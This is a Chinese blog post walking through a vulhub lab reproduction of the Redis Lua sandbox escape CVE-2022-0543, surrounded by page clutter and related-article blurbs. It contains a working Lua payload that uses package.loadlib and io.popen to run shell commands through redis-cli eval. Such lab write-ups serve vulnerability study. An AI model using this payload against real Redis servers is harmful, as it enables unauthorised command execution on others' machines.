Redis Lua沙盒绕过命令执行（CVE-2022-0543）vulhub漏洞复现

最新推荐文章于 2024-09-23 11:39:31 发布

芝士土包鼠

最新推荐文章于 2024-09-23 11:39:31 发布

阅读量189

点赞数 1

分类专栏：漏洞复现文章标签： redis lua 数据库安全网络安全

本文链接：https://blog.csdn.net/qq_53003652/article/details/132108870

版权

漏洞复现专栏收录该内容

71 篇文章 36 订阅

订阅专栏

Redis Lua沙盒绕过命令执行（CVE-2022-0543）

Redis是著名的开源Key-Value数据库，其具备在沙箱中执行Lua脚本的能力。

Debian以及Ubuntu发行版的源在打包Redis时，不慎在Lua沙箱中遗留了一个对象package，攻击者可以利用这个对象提供的方法加载动态链接库liblua里的函数，进而逃逸沙箱执行任意命令。

漏洞复现：

cd /vulhub/redis/CVE-2022-0543

docker-compose up -d

启动后，使用redis-cli连接服务器

在这里插入图片描述

Lua沙箱中遗留了一个变量package，它的loadlib函数来加载动态链接库/usr/lib/x86_64-linux-gnu/liblua5.1.so.0里的导出函数luaopen_io。Lua中执行这个导出函数，即可获得io库，再使用其执行命令：

local io_l = package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0", "luaopen_io");
local io = io_l();
local f = io.popen("id", "r");
local res = f:read("*a");
f:close();
return res

注：不同的环境下liblua路径不同，我的服务器为ubuntu，就用Ubuntu的路径：

/usr/lib/x86_64-linux-gnu/liblua5.1.so.0

连接redis，使用eval命令执行脚本：
在这里插入图片描述

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

芝士土包鼠

关注关注

1
点赞
踩
0

收藏

觉得还不错? 一键收藏
打赏
1
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

专栏目录

Apache Airflow Celery 消息中间件命令执行漏洞CVE-2020-11981POC脚本

12-09

Apache Airflow Celery 消息中间件命令执行漏洞CVE-2020-11981POC脚本 Airflow 是一个使用 python 语言编写的 data pipeline 调度和监控工作流的平台。Airflow 是通过 DAG（Directed acyclic graph 有向无环图）来...

【vulhub漏洞复现】redis 4-unacc 未授权访问漏洞

RexHa的博客

03-03

4970

一、漏洞详情Redis默认情况下，会绑定在0.0.0.0:6379(在redis3.2之后，redis增加了protected-mode，在这个模式下，非绑定IP或者没有配置密码访问时都会报错)，如果没有进行采用相关的策略，比如添加防火墙规则避免其他非信任来源ip访问等等，这样将会将Redis服务暴露在公网上，如果在没有设置密码认证(默认为空)的情况下，会导致任意用户在可以访问目标服务器的情况下未授权访问Redis以及读取Redis的数据。

1 条评论您还未登录，请先登录后发表或查看评论

CVE-2022-0543 Redis Lua沙盒绕过命令执行

Foreverlove112的博客

09-22

541

CVE-2022-0543 Redis Lua沙盒绕过命令执行

Redis Lua沙盒绕过命令执行（CVE-2022-0543）

m0_62373986的博客

12-27

490

Redis是著名的开源Key-Value数据库，其具备在沙箱中执行Lua脚本的能力。Debian以及Ubuntu发行版的源在打包Redis时，不慎在Lua沙箱中遗留了一个对象package，攻击者可以利用这个对象提供的方法加载动态链接库liblua里的函数，进而逃逸沙箱执行任意命令。

vulhub漏洞复现57_Redis

weixin_44193247的博客

02-11

356

vulhub漏洞复现练习篇

vulhub学习文档-Redis 4.x/5.x 未授权访问漏洞

ploto_cs的博客

09-09

1416

Redis 4.x/5.x 未授权访问漏洞 1.redis介绍 Redis 是一个高效数据库，默认情况下，会绑定在 0.0.0.0:6379，如果没有进行采用相关的策略，比如添加防火墙规则避免其他非信任来源 ip 访问等，这样将会将 Redis 服务暴露到公网上，如果在没有设置密码认证（一般为空）的情况下，会导致任意用户在可以访问目标服务器的情况下未授权访问 Redis 以及读取 Redis 的数据。 2.适用类型 数据库版本在4.x/5.x以下 3.预防措施 ①　Redis添加密码验证 ②　Redis尽量

resty-redis-cluster：Redis集群的Openresty lua客户端

02-03

《深入理解resty-redis-cluster：Openresty Lua中的Redis集群客户端》在现代Web服务开发中，数据存储和缓存扮演着至关重要的角色。Redis作为一款高性能的键值存储系统，广泛应用于缓存、消息队列等领域。而...

lua-resty-redis-connector：lua-resty-redis的连接实用程序

02-03

`lua-resty-redis-connector` 是一个针对 `lua-resty-redis` 库的扩展模块，主要用于在 OpenResty（一个基于 Nginx 的高性能 Web 平台，集成了 LuaJIT）环境中提供更高效的 Redis 连接管理。这个库帮助开发者在处理...

Redis-7.0.13-Windows-x64-with-Service

10-06

(CVE-2023-41053) Redis does not correctly identify keys accessed by SORT_RO and as a result may grant users executing this command access to keys that are not explicitly authorized by the ACL ...

lua-resty-redis-connector-master

04-11

在使用lua-resty-redis-connector时，开发者需要先在Lua代码中初始化连接池，然后从池中获取连接，执行相应的Redis命令。例如： ```lua local redis = require "resty.redis" local red = redis:new() red:set_time...

漏洞复现-Redis 未授权访问漏洞

Fisher

06-03

4179

作为菜鸡的我打完网鼎了解到了redis，于是复现一波redis的漏洞，之后再去做一下网鼎ssrfme。攻击者：kali 172.168.229.130 靶机: ubuntu20 172.168.229.132 前置知识：　Redis是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、 Key-Value数据库。（ps理解为就是一个数据库）本漏洞有多条思路： 1.直接用exp getshell 2.在crontab里写定时任务，反弹shell 3. ssh key 直

redis未授权访问漏洞【vulhub靶场】复现

m0_55854679的博客

08-01

877

Redis 默认情况下，会绑定在 0.0.0.0:6379，如果没有进行采用相关的策略，比如添加防火墙规则避免其他非信任来源 ip 访问等，这样将会将 Redis 服务暴露到公网上；如果在没有设置密码认证（一般为空）的情况下，会导致任意用户在可以访问目标服务器的情况下未授权访问 Redis 以及读取 Redis 的数据。攻击者在未授权访问 Redis 的情况下，利用 Redis 自身的提供的config 命令，可以进行写文件操作，攻击者可以成功将自己的ssh公钥写入目标服务器的 /root/.ssh 文件夹

Redis 4.x5.x 未授权访问漏洞（RCE）

网络安全。

02-14

1423

0x01 简介 Redis未授权访问在4.x/5.0.5以前版本下，我们可以使用master/slave模式加载远程模块，通过动态链接库的方式执行任意命令。 0x02 漏洞复现 1、环境启动后，通过redis-cli -h your-ip即可进行连接，可见存在未授权访问漏洞。 2、使用如下POC即可直接执行命令。工具地址：https://github.com/vulhub/redis-rogu...

Redis未授权访问+弱口令检测+getShell漏洞复现

LuckySec

08-23

8936

PS:欢迎访问我的个人博客 http://luckyzmj.cn 0x01 漏洞简介 redis是一个数据库，默认端口是6379，redis默认是没有密码验证的，可以免密码登录操作，攻击者可以通过操作redis进一步控制服务器。 Redis未授权访问在4.x/5.0.5以前版本下，可以使用master/slave模式加载远程模块，通过动态链接库的方式执行任意命令。影响版本 Redis 4.x/5.0.5以前版本 0x02 环境准备漏洞环境使用vulhub复现相当方便。 vulhub官网地址：ht

SSRF——weblogic vulhub 漏洞复现及内网redis反弹shell

weixin_43774222的博客

03-17

6550

一、概述 SSRF（ Server-side Request Forgery ）服务端请求伪造。很多web应用都提供了从其他的服务器上获取数据的功能。使用用户指定的URL，web应用可以获取图片，下载文件，读取文件内容等。这个功能如果被恶意使用，可以利用存在缺陷的web应用作为代理攻击远程和本地的服务器。主要攻击手段 1.可以对外网、服务器所在内网、本地进行端口扫描，获取一些服务的banner信息; 2.攻击运行在内网或本地的应用程序（比如溢出）; 3.对内网web应用进行指纹识别，通过访问默认文件实现

CVE-2022-0543（redis沙盒逃逸）详细漏洞复现

没事我溜达

03-25

8805

参考：vulhub/README.zh-cn.md at master · vulhub/vulhub · GitHub Redis Lua沙盒绕过命令执行（CVE-2022-0543） Redis是著名的开源Key-Value数据库，其具备在沙箱中执行Lua脚本的能力。 Debian以及Ubuntu发行版的源在打包Redis时，不慎在Lua沙箱中遗留了一个对象package，攻击者可以利用这个对象提供的方法加载动态链接库liblua里的函数，进而逃逸沙箱执行任意命令。直接写复现全过程吧

为什么Redis这么快及可以实现的功能

m0_74064008的博客

09-21

560

Redis 提供了多种持久化机制，如 RDB、AOF 和混合持久化机制，这些机制运行都非常高效，可以在不影响性能的情况下保证数据的安全。Redis 提供了多种高效的数据结构，如哈希表、有序集合等，这些数据结构能够快速地进行插入、删除、查找和排序等操作。Redis 的数据存储在内存中，而内存的读写速度远远快于硬盘。Redis 的灵活性使得它可以用于缓存、消息队列、分布式锁、计数器、会话管理等多种场景。Redis 是单线程的，因此可以避免线程切换和锁竞争等问题，提高了 CPU 的利用率和性能。

推荐一款开源的Redis桌面客户端